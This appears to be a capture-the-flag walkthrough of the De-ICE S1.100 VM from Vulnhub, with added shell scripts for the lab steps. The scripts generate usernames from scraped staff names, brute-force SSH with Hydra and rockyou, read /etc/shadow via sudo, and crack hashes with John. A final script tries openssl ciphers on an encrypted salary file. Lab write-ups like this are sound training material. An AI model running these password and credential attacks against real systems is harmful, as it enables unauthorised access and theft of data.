Stepping through De-ICE S1.100

I’ve been running through a bunch of vulnerable VMs recently and wanted to document some of my progress so far. Here’s how I stepped through De-ICE S1.100, which you can get from Vulnhub.

Ran nmap -sS -sV 192.168.50.101 --open --reason (SYN scan with version detection, listing only open ports and the reason nmap classed each port that way)

[screenshot 1]

Ran Nessus against 192.168.50.101

[screenshot 2]

Looked up CVEs for PHP 5.1.x (but this led nowhere)


Looked at the web page and put the names of the IT staff in a text file

[screenshot 3]

Grabbed the rockyou.txt wordlist, ran Hydra with it and got the password for aadams

[screenshot 4]
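An added example, not part of the original write-up, of the two steps above: turning the scraped staff names into login candidates (first initial plus surname, which is the form aadams has) and handing the list to Hydra. The file names, the target address, the wordlist path and the service being SSH (the later shell session implies it) are all assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes the staff names were
# saved one per line as "First Last" in staff.txt, that the login service
# is SSH, and that rockyou.txt sits in the current directory.

# Expand "First Last" into the username forms most Unix sites use:
# first initial + surname (aadams), first.last, firstlast, last, first,
# surname + initial. Output is lower-cased and de-duplicated.
gen_usernames() {
    # $1: file of "First Last" names, one per line
    tr 'A-Z' 'a-z' < "$1" | awk 'NF >= 2 {
        f = $1; l = $NF; i = substr(f, 1, 1)
        print i l; print f "." l; print f l; print l; print f; print l i
    }' | sort -u
}

# Run Hydra with the generated user list against SSH. -t 4 keeps the
# parallelism low enough that sshd's MaxStartups does not start dropping
# connections; -f stops after the first valid user/password pair.
brute_ssh() {
    # $1: target host, $2: user list, $3: password list
    hydra -L "$2" -P "$3" -t 4 -f "ssh://$1"
}

# Constructed sample input standing in for the names scraped from the site.
printf 'Adam Adams\nJane Doe\n' > staff.txt
gen_usernames staff.txt > users.txt
# On the VM you would then run:
# brute_ssh 192.168.50.101 users.txt rockyou.txt
```

The username generator is what matters here: a wordlist attack on SSH only succeeds if the account name is in the list, so every naming convention the site might use goes in, not just the one that looks most likely.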

Logged in as aadams

[screenshot 5]

Ran cat /etc/passwd and cat /etc/shadow, but got permission denied on the shadow file, so I ran sudo cat /etc/shadow, entered his password and got the results. (That only works because aadams is permitted to run commands through sudo; sudo -l shows what an account is allowed to run before you try it.)

[screenshot 6]

[screenshot 7]

I then tried running the hashes through some online hash checkers but couldn’t find one that worked, so I looked up other options and John the Ripper came up. Of course! (duh) I then copied the hashes into a text file called hashes.txt (but forgot root… oops!) and ran John with the rockyou wordlist.

[screenshot 8]

[screenshot 9]

[screenshot 10]

[screenshot 11]
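An added example, not from the original post, of the hash-cracking step done so that no account (root included) gets left out: instead of copying hashes by hand, join the passwd and shadow copies the way John's own unshadow tool does, drop the accounts that have no real hash, and only then run john. The local file names and the hash values in the sample are constructed placeholders; rockyou.txt in the current directory is an assumption.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes /etc/passwd and
# /etc/shadow from the target were saved locally as passwd.txt and
# shadow.txt (for example from the sudo cat above).

# Join passwd and shadow on the username so every account ends up in the
# file john reads. This is what John's unshadow does; the awk fallback
# produces the same user:hash:uid:gid:gecos:home:shell lines when unshadow
# is not installed.
build_hashes() {
    # $1: passwd file, $2: shadow file
    if command -v unshadow >/dev/null 2>&1; then
        unshadow "$1" "$2"
    else
        awk -F: -v OFS=: 'NR == FNR { h[$1] = $2; next }
                          ($1 in h) { $2 = h[$1]; print }' "$2" "$1"
    fi
}

# Keep only accounts with a real hash: "*", "!" and a leading "!" mean
# password login is disabled, so they only waste john's time.
crackable() {
    awk -F: '$2 != "" && $2 != "*" && $2 !~ /^!/'
}

# Wordlist attack with John's default mangling rules, then print what fell.
# Not run here because it needs john and the wordlist on this machine.
crack() {
    # $1: hash file, $2: wordlist
    john --wordlist="$2" --rules "$1"
    john --show "$1"
}

# Constructed sample input: the hash strings are placeholders in md5crypt
# ($1$) layout, not real password hashes.
cat > passwd.txt <<'EOF'
root:x:0:0:root:/root:/bin/bash
aadams:x:1000:1000:Adam Adams:/home/aadams:/bin/bash
sshd:x:74:74:sshd:/var/empty:/bin/false
EOF
cat > shadow.txt <<'EOF'
root:$1$saltsalt$placeholderhashhashhashhash0:13000:0:99999:7:::
aadams:$1$saltsalt$placeholderhashhashhashhash1:13000:0:99999:7:::
sshd:*:13000:0:99999:7:::
EOF
build_hashes passwd.txt shadow.txt | crackable > hashes.txt
# crack hashes.txt rockyou.txt
```

Building the input mechanically is the point: the account most worth cracking is the one easiest to skip when copying by hand.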

I then started looking around and found an ftp directory with a file named salary_dec2003.vsc.enc. I looked up what .enc files were and how to open them (after trying some other dead ends) and found openssl, which was installed on the box. I ran it with the example I found, but it didn’t work, so I looked at the help output, saw I could try other ciphers, tried the first one in the list and was able to decrypt the file! The output was huge, though, so I looked up how to view it more comfortably and learned of the less command.

[screenshot 12]
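An added example, not from the original post, of the cipher-by-cipher decryption described above, plus one caveat the post does not mention: before OpenSSL 1.1.0, openssl enc derived the key from the passphrase with MD5, and from 1.1.0 on with SHA-256, so a file encrypted on an old box may only open with -md md5 on a current system. The sample file, its passphrase and the cipher used to make it are constructed assumptions so the script runs offline.

```shell
#!/bin/sh
# Added example, not from the original post. On the VM you would point
# try_ciphers at the real .enc file and the passwords recovered earlier.

# Decrypt $1 with each candidate cipher in turn, using passphrase $2 and
# key-derivation digest $4 (md5 for files made by OpenSSL < 1.1.0, sha256
# otherwise), writing the plaintext to $3 and printing the cipher that
# worked. A wrong cipher or passphrase almost always fails the padding
# check ("bad decrypt"); the printable-text test catches the rare case
# where random padding happens to look valid. A fuller candidate list
# comes from "openssl enc -ciphers"; a few common ones are enough here.
try_ciphers() {
    # $1: input file, $2: passphrase, $3: output file, $4: digest
    for c in aes-128-cbc aes-192-cbc aes-256-cbc des-ede3-cbc bf-cbc; do
        if openssl enc -d "-$c" -md "$4" -pass "pass:$2" \
                   -in "$1" -out "$3" 2>/dev/null \
           && [ -s "$3" ] \
           && ! LC_ALL=C grep -q '[^[:print:][:space:]]' "$3"; then
            echo "$c"
            return 0
        fi
    done
    rm -f "$3"
    return 1
}

# Constructed sample: a small CSV encrypted the way the VM's file might
# have been. Cipher, digest and passphrase are assumptions.
printf 'name,title,salary\nAdam Adams,Sysadmin,50000\n' > salary_sample.csv
openssl enc -aes-256-cbc -md sha256 -pass pass:Secret123 \
        -in salary_sample.csv -out salary_sample.csv.enc

# Expected to skip aes-128-cbc and aes-192-cbc, then print aes-256-cbc.
try_ciphers salary_sample.csv.enc Secret123 salary_sample.out sha256 \
    && head salary_sample.out
```

Once a cipher works, view the result with less rather than cat, as the post says; and if every cipher fails with the right password, try the other digest before assuming the password is wrong.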

Success!

[screenshot 13]